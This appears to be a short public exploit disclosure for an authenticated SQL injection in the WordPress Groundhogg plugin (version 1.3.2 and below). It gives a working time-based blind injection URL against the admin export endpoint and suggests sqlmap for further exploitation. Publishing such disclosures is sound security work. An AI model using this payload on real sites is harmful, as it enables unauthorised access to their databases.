# Exploit Title: Wordpress Groundhogg <= 1.3.2 Authenticated SQL Injection Vulnerability
# Date: 23-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Vendor Homepage: https://www.groundhogg.io/
# Software Link: https://wordpress.org/plugins/groundhogg/
# Version: 1.3.2
# Tested on: Ubuntu 18.04 / Wordpress 5.3
1. Description:
Wordpress Groundhogg plugin with a version lower than 1.3.2 is affected by an Authenticated SQL Injection vulnerability.
2. Proof of Concept:
Authenticated SQL Injection:
- Using an Wordpress user, access <your target> /wp-admin/admin.php?page=gh_bulk_jobs&action=gh_export_contacts&optin_status%5B0%5D=(select*from(select(sleep(20)))a)&optin_status%5B1%5D=0
- The response will be returned after 20 seconds proving the successful exploitation of the vulnerability.
- Sqlmap can be used to further exploit the vulnerability.